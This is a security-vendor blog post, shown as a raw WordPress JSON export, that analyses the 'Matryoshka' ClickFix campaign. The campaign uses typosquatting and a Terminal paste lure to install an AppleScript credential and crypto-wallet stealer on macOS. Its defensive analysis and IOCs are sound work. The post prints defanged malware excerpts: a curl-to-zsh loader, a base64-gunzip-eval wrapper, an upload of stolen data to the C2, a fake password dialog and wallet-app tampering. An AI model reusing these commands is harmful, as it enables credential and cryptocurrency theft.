{"id":104102,"date":"2026-02-12T02:22:54","date_gmt":"2026-02-12T10:22:54","guid":{"rendered":"https:\/\/www.intego.com\/mac-security-blog\/?p=104102"},"modified":"2026-03-03T04:56:11","modified_gmt":"2026-03-03T12:56:11","slug":"matryoshka-clickfix-macos-stealer","status":"publish","type":"post","link":"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/","title":{"rendered":"Unpacking the New \u201cMatryoshka\u201d ClickFix Variant: Typosquatting Campaign Delivers macOS Stealer"},"content":{"rendered":"<p><img loading=\"lazy\" class=\"alignnone wp-image-104101\" src=\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2026\/02\/matryoshka-clickfix-terminal-installation-screenshot-277x300.png\" alt=\"Screenshot of a fake \u201cDownload for macOS\u201d page showing a \u201cTerminal installation\u201d command with a Copy button and steps for opening Terminal.\" width=\"540\" height=\"585\" srcset=\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2026\/02\/matryoshka-clickfix-terminal-installation-screenshot-277x300.png 277w, https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2026\/02\/matryoshka-clickfix-terminal-installation-screenshot-139x150.png 139w, https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2026\/02\/matryoshka-clickfix-terminal-installation-screenshot.png 473w\" sizes=\"(max-width: 540px) 100vw, 540px\" \/><\/p>\n<h2 data-start=\"316\" data-end=\"412\"><\/h2>\n<h2 data-start=\"496\" data-end=\"516\">Executive Summary<\/h2>\n<p data-start=\"518\" data-end=\"802\">Intego Antivirus Labs is tracking an evolution of the \u201cClickFix\u201d social engineering campaign targeting macOS users. Dubbed <strong data-start=\"641\" data-end=\"655\">Matryoshka<\/strong> due to its nested obfuscation layers, this variant uses a fake installation\/fix flow to trick victims into executing a malicious Terminal command.<\/p>\n<p data-start=\"804\" data-end=\"1046\">While the ClickFix tactic is not new, this campaign introduces stronger evasion techniques \u2014 including an <strong data-start=\"910\" data-end=\"943\">in-memory, compressed wrapper<\/strong> and <strong data-start=\"948\" data-end=\"984\">API-gated network communications<\/strong> \u2014 designed to hinder static analysis and automated sandboxes.<\/p>\n<p data-start=\"1048\" data-end=\"1306\">At a high level, the attack relies on typosquatting and redirect infrastructure to deliver a \u201cpaste this fix\u201d prompt. Once executed, a loader retrieves an AppleScript payload that attempts to harvest browser credentials and target crypto wallet applications.<\/p>\n<div style=\"height: 8px; line-height: 8px;\"><\/div>\n<h2 data-start=\"1313\" data-end=\"1361\">Infection Vector: Typosquatting and Redirects<\/h2>\n<p data-start=\"1363\" data-end=\"1545\">The infection chain observed by our labs begins with a classic <a href=\"https:\/\/www.intego.com\/mac-security-blog\/type-a-url-wrong-and-you-might-end-up-with-malware-on-your-mac\/\"><strong data-start=\"1426\" data-end=\"1443\">typosquatting<\/strong><\/a> lure. Users attempting to visit legitimate software review sites are at risk if they mistype the URL.<\/p>\n<p data-start=\"1547\" data-end=\"1675\">We observed this specifically with <strong data-start=\"1582\" data-end=\"1604\">comparisions[.]org<\/strong> (note the extra \u201ci\u201d), a typosquatted domain targeting comparisons.org.<\/p>\n<h3 data-start=\"1677\" data-end=\"1696\">The attack flow<\/h3>\n<ul data-start=\"1698\" data-end=\"2025\">\n<li data-start=\"1698\" data-end=\"1790\">\n<p data-start=\"1700\" data-end=\"1790\"><strong data-start=\"1700\" data-end=\"1713\">The typo:<\/strong> The user accidentally visits the typosquatted domain (comparisions[.]org).<\/p>\n<\/li>\n<li data-start=\"1791\" data-end=\"1903\">\n<p data-start=\"1793\" data-end=\"1903\"><strong data-start=\"1793\" data-end=\"1810\">The redirect:<\/strong> The site immediately forwards the visitor through a <strong data-start=\"1863\" data-end=\"1900\">Traffic Distribution System (TDS)<\/strong>.<\/p>\n<\/li>\n<li data-start=\"1904\" data-end=\"2025\">\n<p data-start=\"1906\" data-end=\"2025\"><strong data-start=\"1906\" data-end=\"1919\">The trap:<\/strong> The user is presented with instructions to copy a \u201cfix\u201d command and paste it into the macOS <strong data-start=\"2012\" data-end=\"2024\">Terminal<\/strong>.<\/p>\n<\/li>\n<\/ul>\n<p data-start=\"2027\" data-end=\"2239\"><strong data-start=\"2027\" data-end=\"2046\">Why this works:<\/strong> This is a social engineering bypass. By pasting a command into Terminal, the user unknowingly authorizes execution, sidestepping the normal download-and-launch expectations many users rely on.<\/p>\n<p>&nbsp;<\/p>\n<h2 data-start=\"2246\" data-end=\"2293\">Technical Analysis: The \u201cMatryoshka\u201d Wrapper<\/h2>\n<p data-start=\"2295\" data-end=\"2509\">Unlike earlier ClickFix variants that delivered relatively readable scripts, this campaign uses a \u201cMatryoshka\u201d (Russian doll) style wrapper to hide its inner logic from network scanners and quick static inspection.<\/p>\n<h3 data-start=\"2511\" data-end=\"2543\">Stage 0: Clipboard injection<\/h3>\n<p data-start=\"2545\" data-end=\"2711\">The pasted command does not directly download a standard macOS application. Instead, it retrieves a benign-looking shell script that contains a large encoded payload.<\/p>\n<p data-start=\"2713\" data-end=\"2812\">Below is a <strong data-start=\"2724\" data-end=\"2736\">redacted<\/strong> representation of the Stage 0 behavior (non-operational; domains defanged):<\/p>\n<div dir=\"ltr\"><code><span style=\"color: #3b5b8a;\"># Observed logic pattern (redacted; non-operational) echo \"Installing packages please wait...\" curl -fsSL hxxp:\/\/barbermoo[.]xyz\/curl\/[TOKEN] | zsh <\/span><\/code><\/div>\n<p>&nbsp;<\/p>\n<h3 data-start=\"2980\" data-end=\"3025\">Stage 1: In-memory decode + decompression<\/h3>\n<p data-start=\"3027\" data-end=\"3147\">The fetched script (commonly referenced as <code data-start=\"3070\" data-end=\"3080\"><span style=\"color: #a67c00;\">rogue.sh<\/span><\/code>) uses a heredoc to pass the payload through an in-memory pipeline:<\/p>\n<p data-start=\"3149\" data-end=\"3182\"><strong data-start=\"3149\" data-end=\"3182\">Base64 decode \u2192 gunzip \u2192 eval<\/strong><\/p>\n<p data-start=\"3184\" data-end=\"3367\">This is the core reason we refer to this variant as Matryoshka \u2014 the meaningful payload is nested inside an encoded\/compressed blob and only becomes readable when expanded at runtime.<\/p>\n<h3 data-start=\"3369\" data-end=\"3411\">De-obfuscated wrapper logic (excerpt)<\/h3>\n<div>\n<div dir=\"ltr\"><code><span style=\"color: #3b5b8a;\">#!\/bin\/zsh # Simplified excerpt showing the decode\/decompress\/execute pipeline payload=$(base64 -D &lt;&lt;'PAYLOAD' | gunzip [...large base64+gzip content omitted...] PAYLOAD ) eval \"$payload\" <\/span><\/code><\/div>\n<\/div>\n<p data-start=\"3614\" data-end=\"3856\"><strong data-start=\"3614\" data-end=\"3627\">Analysis:<\/strong> This wrapper hides the inner logic inside a compressed archive that is \u201cexploded\u201d in memory and may not be written to disk as a clean script file, reducing visibility for file-based scanning and complicating basic static triage.<\/p>\n<div style=\"height: 8px; line-height: 8px;\"><\/div>\n<h3 data-start=\"3863\" data-end=\"3913\">Stage 2: API-Gated Loader and Evasion Behaviors<\/h3>\n<p data-start=\"3915\" data-end=\"4075\">Once the wrapper expands, the inner loader executes. Our analysis revealed several evasion mechanisms that help the chain run quickly and complicate sandboxing.<\/p>\n<p>&nbsp;<\/p>\n<h2 data-start=\"4077\" data-end=\"4111\">Key evasion behaviors observed<\/h2>\n<h3 data-start=\"4113\" data-end=\"4142\">1) Background detachment<\/h3>\n<p data-start=\"4143\" data-end=\"4332\">The loader runs its main routine in the background and exits quickly. The user sees their Terminal prompt return almost immediately, which can lead them to believe the process has finished.<\/p>\n<h3 data-start=\"4334\" data-end=\"4360\">2) Output suppression<\/h3>\n<p data-start=\"4361\" data-end=\"4474\">The loader redirects stdin\/stdout\/stderr to suppress errors and reduce visible artifacts in the terminal session.<\/p>\n<h3 data-start=\"4476\" data-end=\"4507\">3) API-gated communication<\/h3>\n<p data-start=\"4508\" data-end=\"4690\">Requests require a specific custom header to receive meaningful responses from the server. Without this header, the infrastructure may respond with generic errors or appear inactive.<\/p>\n<h3 data-start=\"4692\" data-end=\"4722\">4) Conditional forwarding<\/h3>\n<p data-start=\"4723\" data-end=\"4865\">The script checks for arguments and can append supplied input to outbound requests, consistent with passing harvested material between stages.<\/p>\n<h3 data-start=\"4867\" data-end=\"4917\">De-obfuscated loader logic (redacted excerpt)<\/h3>\n<div>\n<div dir=\"ltr\"><code><span style=\"color: #3b5b8a;\">daemon_function() { # Silence output exec &lt;\/dev\/null &gt;\/dev\/null 2&gt;\/dev\/null domain=\"barbermoo[.]xyz\" api_key=\"5190ef17\u2026\" # truncated # Fetch AppleScript payload (API-gated) # If an argument exists, it may be attached to the request if [ $# -gt 0 ]; then curl -s -H \"api-key: $api_key\" \"hxxp:\/\/$domain\/dynamic?txd=$token&amp;pwd=$1\" | osascript else curl -s -H \"api-key: $api_key\" \"hxxp:\/\/$domain\/dynamic?txd=$token\" | osascript fi # Exfiltration (staging archive) curl -X POST \\ -H \"api-key: $api_key\" \\ -F \"file=@\/tmp\/osalogging.zip\" \\ -F \"buildtxd=$token\" \\ \"hxxp:\/\/$domain\/gate\" rm -f \/tmp\/osalogging.zip } # Run in background to return control to user quickly daemon_function \"$@\" &amp; exit 0<\/span><\/code><code> <\/code><\/div>\n<\/div>\n<p>&nbsp;<\/p>\n<h2 data-start=\"5681\" data-end=\"5727\">Payload: Stealer Capabilities (AppleScript)<\/h2>\n<p data-start=\"5729\" data-end=\"5832\"><strong data-start=\"5729\" data-end=\"5750\">Payload filename:<\/strong> <code data-start=\"5751\" data-end=\"5775\"><span style=\"color: #a67c00;\">rogue_applescript.scpt<\/span><\/code><br data-start=\"5775\" data-end=\"5778\" \/><strong data-start=\"5778\" data-end=\"5799\">Intego detection:<\/strong> <code data-start=\"5800\" data-end=\"5832\"><span style=\"color: #a67c00;\">trojan:AppleScript\/Stealer.gen<\/span><\/code><\/p>\n<p data-start=\"5834\" data-end=\"5975\">If the handshake is successful, the infrastructure delivers an <a href=\"https:\/\/www.intego.com\/mac-security-blog\/intego-malware-discovery-fake-arc-browser-with-unique-applescript-component\/\">AppleScript payload<\/a> designed to harvest credentials and target crypto wallets.<\/p>\n<h3 data-start=\"5977\" data-end=\"6020\">A) Password capture via a phishing loop<\/h3>\n<p data-start=\"6022\" data-end=\"6287\">The payload first attempts to retrieve sensitive material programmatically. If unsuccessful, it falls back to an interactive phishing loop that presents a macOS-style dialog branded as \u201cSystem Preferences,\u201d repeatedly prompting the user until they enter a password.<\/p>\n<h4 data-start=\"6289\" data-end=\"6324\"><strong>AppleScript excerpt (redacted)<\/strong><\/h4>\n<div>\n<div dir=\"ltr\"><code><span style=\"color: #3b5b8a;\">-- Redacted excerpt illustrating the fallback dialog loop concept set result to display dialog \"Required Application Helper. Please enter password to continue.\" default answer \"\" with title \"System Preferences\" with hidden answer <\/span><\/code><\/div>\n<\/div>\n<h3 data-start=\"6583\" data-end=\"6636\">B) Wallet targeting: Ledger Live and Trezor Suite<\/h3>\n<p data-start=\"6638\" data-end=\"6730\">The malware aggressively targets hardware wallet applications using two distinct approaches.<\/p>\n<h4 data-start=\"6732\" data-end=\"6773\"><strong>1) Trezor Suite (delete and replace)<\/strong><\/h4>\n<p data-start=\"6774\" data-end=\"6907\">If Trezor Suite is found, the script attempts to terminate the process, remove the application, and download a malicious replacement.<\/p>\n<h4 data-start=\"6909\" data-end=\"6948\"><strong>2) Ledger Live (surgical patching)<\/strong><\/h4>\n<p data-start=\"6949\" data-end=\"7181\">Ledger Live is handled more subtly. The payload attempts to replace an Electron archive (<strong data-start=\"7038\" data-end=\"7052\"><code data-start=\"7040\" data-end=\"7050\"><span style=\"color: #a67c00;\">app.asar<\/span><\/code><\/strong>) and related metadata within the legitimate application bundle, then performs <strong data-start=\"7131\" data-end=\"7151\">local re-signing<\/strong> to reduce integrity warnings.<\/p>\n<h4 data-start=\"7183\" data-end=\"7235\"><strong>AppleScript excerpt (redacted; non-operational)<\/strong><\/h4>\n<div>\n<div dir=\"ltr\"><code><span style=\"color: #3b5b8a;\">-- Redacted example showing the concept (URLs and key truncated) -- Downloads replacement components, swaps them into the bundle, then ad-hoc signs do shell script \"curl -L -H 'api-key: 5190ef17\u2026' hxxps:\/\/barbermoo[.]xyz\/ledger\/... -o \/tmp\/ledger.dmg\" do shell script \"codesign -f -s - \/Applications\/Ledger\\\\ Live.app\" <\/span><\/code><\/div>\n<\/div>\n<h3 data-start=\"7581\" data-end=\"7603\">C) Final deception<\/h3>\n<p data-start=\"7605\" data-end=\"7841\">After collecting data (including browser material and wallet-related artifacts), the script stages it into <code data-start=\"7712\" data-end=\"7733\"><span style=\"color: #a67c00;\">\/tmp\/osalogging.zip<\/span><\/code> for the loader to upload. It then displays a final error message intended to misdirect the victim, such as:<\/p>\n<blockquote data-start=\"7843\" data-end=\"7951\">\n<p data-start=\"7845\" data-end=\"7951\">\u201cYour Mac does not support this application. Try reinstalling or downloading the version for your system.\u201d<\/p>\n<\/blockquote>\n<p data-start=\"7953\" data-end=\"8009\">This helps reduce suspicion and can delay investigation.<\/p>\n<p>&nbsp;<\/p>\n<h2 data-start=\"8016\" data-end=\"8043\">Detection and Protection<\/h2>\n<p data-start=\"8045\" data-end=\"8208\">This campaign highlights the risks of \u201cfileless-style\u201d execution, where a user is tricked into running a command that executes remote content from a shell session.<\/p>\n<p data-start=\"8210\" data-end=\"8516\">However, the chain still creates defensive opportunities \u2014 including network activity, AppleScript execution, temporary staging archives, and wallet application tampering attempts. Intego VirusBarrier detects components of this attack when they touch the filesystem or when payload behaviors are triggered.<\/p>\n<p data-start=\"8518\" data-end=\"8540\"><strong data-start=\"8518\" data-end=\"8540\">Intego detections:<\/strong><\/p>\n<ul data-start=\"8541\" data-end=\"8645\">\n<li data-start=\"8541\" data-end=\"8586\">\n<p data-start=\"8543\" data-end=\"8586\"><code data-start=\"8543\" data-end=\"8566\"><span style=\"color: #a67c00;\">trojan:OSX\/Stealer.sh<\/span><\/code> (Bash\/Zsh loader)<\/p>\n<\/li>\n<li data-start=\"8587\" data-end=\"8645\">\n<p data-start=\"8589\" data-end=\"8645\"><code data-start=\"8589\" data-end=\"8621\"><span style=\"color: #a67c00;\">trojan:AppleScript\/Stealer.gen<\/span><\/code> (AppleScript payload)<\/p>\n<\/li>\n<\/ul>\n<p data-start=\"8647\" data-end=\"8720\"><strong data-start=\"8647\" data-end=\"8658\">Status:<\/strong> Active signatures for observed stages of the infection chain.<\/p>\n<h3 data-start=\"8722\" data-end=\"8740\">Recommendation<\/h3>\n<p data-start=\"8742\" data-end=\"8977\">Users should be trained that legitimate software updates, drivers, and \u201cfixes\u201d will never require pasting code into Terminal. If a website instructs you to \u201cpaste this command to fix an error,\u201d treat it as malicious and close the page.<\/p>\n<p>&nbsp;<\/p>\n<h2 data-start=\"8984\" data-end=\"9018\">Indicators of Compromise (IOCs)<\/h2>\n<div>\n<div tabindex=\"-1\">\n<table>\n<thead>\n<tr>\n<th>Type<\/th>\n<th>Indicator<\/th>\n<th>Context<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>C2 domain<\/td>\n<td>barbermoo[.]xyz<\/td>\n<td>Primary command-and-control infrastructure<\/td>\n<\/tr>\n<tr>\n<td>Typosquatting domain<\/td>\n<td>comparisions[.]org<\/td>\n<td>Initial redirect (typosquat)<\/td>\n<\/tr>\n<tr>\n<td>Gateway URL<\/td>\n<td>macfilesendstream[.]com<\/td>\n<td>\/r2\/ \u2014 Traffic distribution \/ routing<\/td>\n<\/tr>\n<tr>\n<td>Header<\/td>\n<td>api-key: 5190ef17\u2026<\/td>\n<td>Required for C2 communication (truncated)<\/td>\n<\/tr>\n<tr>\n<td>File path<\/td>\n<td>\/tmp\/osalogging.zip<\/td>\n<td>Staging file for stolen data<\/td>\n<\/tr>\n<tr>\n<td>SHA-256<\/td>\n<td>Observed sample<\/td>\n<td>62ca9538 889b767b 1c3b93e7 6a32fb44 69a2486c b3ccb5fb 5fa8beb2 dd0c2b90<\/td>\n<\/tr>\n<tr>\n<td>SHA-256<\/td>\n<td>Wrapper script (rogue.sh)<\/td>\n<td>d675bff1 b895b1a2 31c86ace 9d7a39d5 704e84c4 bc015525 b2a9c80c 39158338<\/td>\n<\/tr>\n<tr>\n<td>SHA-256<\/td>\n<td>Inner loader script<\/td>\n<td>48770b64 93f2b9b9 e1d9bdbf 482ed981 e709bd03 e53885ff 992121af 16f76a09<\/td>\n<\/tr>\n<tr>\n<td>SHA-256<\/td>\n<td>AppleScript payload (rogue_applescript.scpt)<\/td>\n<td>(add if available)<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<\/div>\n<\/div>\n<div style=\"height: 8px; line-height: 8px;\"><\/div>\n<h2>What to Know and What to Do<\/h2>\n<p>Matryoshka is a good example of why ClickFix-style campaigns keep working on macOS: the attacker doesn\u2019t need an exploit if they can convince the user to run the first command. From there, layered in-memory unpacking and API-gated delivery make the chain harder to inspect quickly, while the AppleScript payload focuses on high-value targets like browser credentials and crypto wallets.<\/p>\n<p>The most important defense is behavioral: treat any website that asks you to paste a \u201cfix\u201d command into Terminal as malicious. For teams, focus detections on the execution chain and the artifacts it still leaves behind.<\/p>\n<ul>\n<li>Block and monitor typosquatting domains and TDS-style redirect infrastructure.<\/li>\n<li>Alert on Terminal-initiated fetch-and-execute patterns and unexpected <strong>osascript<\/strong> execution.<\/li>\n<li>Watch for suspicious staging archives under <strong>\/tmp\/<\/strong> and tampering or re-signing of wallet applications.<\/li>\n<\/ul>\n<div style=\"border-left: 4px solid #3B5B8A; background: #f7f7f7; padding: 12px 14px; margin: 14px 0;\"><strong>Researcher note:<\/strong> The infrastructure may require a custom header value to return meaningful responses. Without it, the server can appear inactive or return generic errors \u2014 a tactic used to frustrate automated analysis.<\/div>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Executive Summary Intego Antivirus Labs is tracking an evolution of the \u201cClickFix\u201d social engineering campaign targeting macOS users. Dubbed Matryoshka due to its nested obfuscation layers, this variant uses a fake installation\/fix flow to trick victims into executing a malicious Terminal command. While the ClickFix tactic is not new, this campaign introduces stronger evasion techniques [&hellip;]<\/p>\n","protected":false},"author":115,"featured_media":104101,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"spay_email":"","jetpack_publicize_message":"","jetpack_is_tweetstorm":false},"categories":[190,13,5],"tags":[4809,4810],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v17.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<meta name=\"description\" content=\"Executive Summary Intego Antivirus Labs is tracking an evolution of the \u201cClickFix\u201d social engineering campaign targeting macOS users. Dubbed Matryoshka Intego analyzed the Matryoshka ClickFix variant using typosquatting and a Terminal paste lure to deliver an AppleScript stealer and target crypto wallets.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Unpacking the New \u201cMatryoshka\u201d ClickFix Variant: Typosquatting Campaign Delivers macOS Stealer - The Mac Security Blog Matryoshka ClickFix Variant Delivers macOS Stealer via Typosquatting\" \/>\n<meta property=\"og:description\" content=\"Executive Summary Intego Antivirus Labs is tracking an evolution of the \u201cClickFix\u201d social engineering campaign targeting macOS users. Dubbed Matryoshka Intego analyzed the Matryoshka ClickFix variant using typosquatting and a Terminal paste lure to deliver an AppleScript stealer and target crypto wallets.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/\" \/>\n<meta property=\"og:site_name\" content=\"The Mac Security Blog\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-12T10:22:54+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-03-03T12:56:11+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2026\/02\/matryoshka-clickfix-terminal-installation-screenshot.png\" \/>\n\t<meta property=\"og:image:width\" content=\"473\" \/>\n\t<meta property=\"og:image:height\" content=\"512\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Frederic Blaison\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/#organization\",\"name\":\"Intego\",\"url\":\"https:\/\/www.intego.com\/mac-security-blog\/\",\"sameAs\":[],\"logo\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/#logo\",\"inLanguage\":\"en-US\",\"url\":\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2022\/10\/intego-organization-logo-for-google-knowledge-graph-875x875-1.png\",\"contentUrl\":\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2022\/10\/intego-organization-logo-for-google-knowledge-graph-875x875-1.png\",\"width\":875,\"height\":875,\"caption\":\"Intego\"},\"image\":{\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/#logo\"}},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/#website\",\"url\":\"https:\/\/www.intego.com\/mac-security-blog\/\",\"name\":\"The Mac Security Blog\",\"description\":\"Keep Macs safe from the dangers of the Internet\",\"publisher\":{\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.intego.com\/mac-security-blog\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#primaryimage\",\"inLanguage\":\"en-US\",\"url\":\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2026\/02\/matryoshka-clickfix-terminal-installation-screenshot.png\",\"contentUrl\":\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2026\/02\/matryoshka-clickfix-terminal-installation-screenshot.png\",\"width\":473,\"height\":512,\"caption\":\"Example of a ClickFix-style lure that instructs users to copy a Terminal command from a download page.\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#webpage\",\"url\":\"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/\",\"name\":\"Unpacking the New \\u201cMatryoshka\\u201d ClickFix Variant: Typosquatting Campaign Delivers macOS Stealer - The Mac Security Blog Matryoshka ClickFix Variant Delivers macOS Stealer via Typosquatting\",\"isPartOf\":{\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#primaryimage\"},\"datePublished\":\"2026-02-12T10:22:54+00:00\",\"dateModified\":\"2026-03-03T12:56:11+00:00\",\"description\":\"Executive Summary Intego Antivirus Labs is tracking an evolution of the \\u201cClickFix\\u201d social engineering campaign targeting macOS users. Dubbed Matryoshka Intego analyzed the Matryoshka ClickFix variant using typosquatting and a Terminal paste lure to deliver an AppleScript stealer and target crypto wallets.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.intego.com\/mac-security-blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Unpacking the New \\u201cMatryoshka\\u201d ClickFix Variant: Typosquatting Campaign Delivers macOS Stealer\"}]},{\"@type\":\"Article\",\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#webpage\"},\"author\":{\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/#\/schema\/person\/08c0037f7ab259cf049d6c332f30c5b2\"},\"headline\":\"Unpacking the New \\u201cMatryoshka\\u201d ClickFix Variant: Typosquatting Campaign Delivers macOS Stealer\",\"datePublished\":\"2026-02-12T10:22:54+00:00\",\"dateModified\":\"2026-03-03T12:56:11+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#webpage\"},\"wordCount\":1193,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2026\/02\/matryoshka-clickfix-terminal-installation-screenshot.png\",\"keywords\":[\"ClickFix macOS malware AppleScript stealer typosquatting\",\"crypto wallet\"],\"articleSection\":[\"Malware\",\"Security &amp; Privacy\",\"Security News\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/#respond\"]}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/#\/schema\/person\/08c0037f7ab259cf049d6c332f30c5b2\",\"name\":\"Frederic Blaison\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/#personlogo\",\"inLanguage\":\"en-US\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/0f7a55283c5b8924a7e54b5d6191cd80?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/0f7a55283c5b8924a7e54b5d6191cd80?s=96&d=mm&r=g\",\"caption\":\"Frederic Blaison\"},\"description\":\"Frederic is Intego\\u2019s Antivirus Labs Tech Lead, overseeing research into macOS malware and persistent threats. With over 30 years of expertise in Apple technologies, Fred\\u2019s background spans system administration, QA, and hands-on malware analysis, bringing deep technical insight to the front lines of macOS security.\",\"url\":\"https:\/\/www.intego.com\/mac-security-blog\/author\/frederic-blaison\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"description":"Executive Summary Intego Antivirus Labs is tracking an evolution of the \u201cClickFix\u201d social engineering campaign targeting macOS users. Dubbed Matryoshka Intego analyzed the Matryoshka ClickFix variant using typosquatting and a Terminal paste lure to deliver an AppleScript stealer and target crypto wallets.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/","og_locale":"en_US","og_type":"article","og_title":"Unpacking the New \u201cMatryoshka\u201d ClickFix Variant: Typosquatting Campaign Delivers macOS Stealer - The Mac Security Blog Matryoshka ClickFix Variant Delivers macOS Stealer via Typosquatting","og_description":"Executive Summary Intego Antivirus Labs is tracking an evolution of the \u201cClickFix\u201d social engineering campaign targeting macOS users. Dubbed Matryoshka Intego analyzed the Matryoshka ClickFix variant using typosquatting and a Terminal paste lure to deliver an AppleScript stealer and target crypto wallets.","og_url":"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/","og_site_name":"The Mac Security Blog","article_published_time":"2026-02-12T10:22:54+00:00","article_modified_time":"2026-03-03T12:56:11+00:00","og_image":[{"width":473,"height":512,"url":"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2026\/02\/matryoshka-clickfix-terminal-installation-screenshot.png","type":"image\/png"}],"twitter_card":"summary_large_image","twitter_misc":{"Written by":"Frederic Blaison","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Organization","@id":"https:\/\/www.intego.com\/mac-security-blog\/#organization","name":"Intego","url":"https:\/\/www.intego.com\/mac-security-blog\/","sameAs":[],"logo":{"@type":"ImageObject","@id":"https:\/\/www.intego.com\/mac-security-blog\/#logo","inLanguage":"en-US","url":"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2022\/10\/intego-organization-logo-for-google-knowledge-graph-875x875-1.png","contentUrl":"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2022\/10\/intego-organization-logo-for-google-knowledge-graph-875x875-1.png","width":875,"height":875,"caption":"Intego"},"image":{"@id":"https:\/\/www.intego.com\/mac-security-blog\/#logo"}},{"@type":"WebSite","@id":"https:\/\/www.intego.com\/mac-security-blog\/#website","url":"https:\/\/www.intego.com\/mac-security-blog\/","name":"The Mac Security Blog","description":"Keep Macs safe from the dangers of the 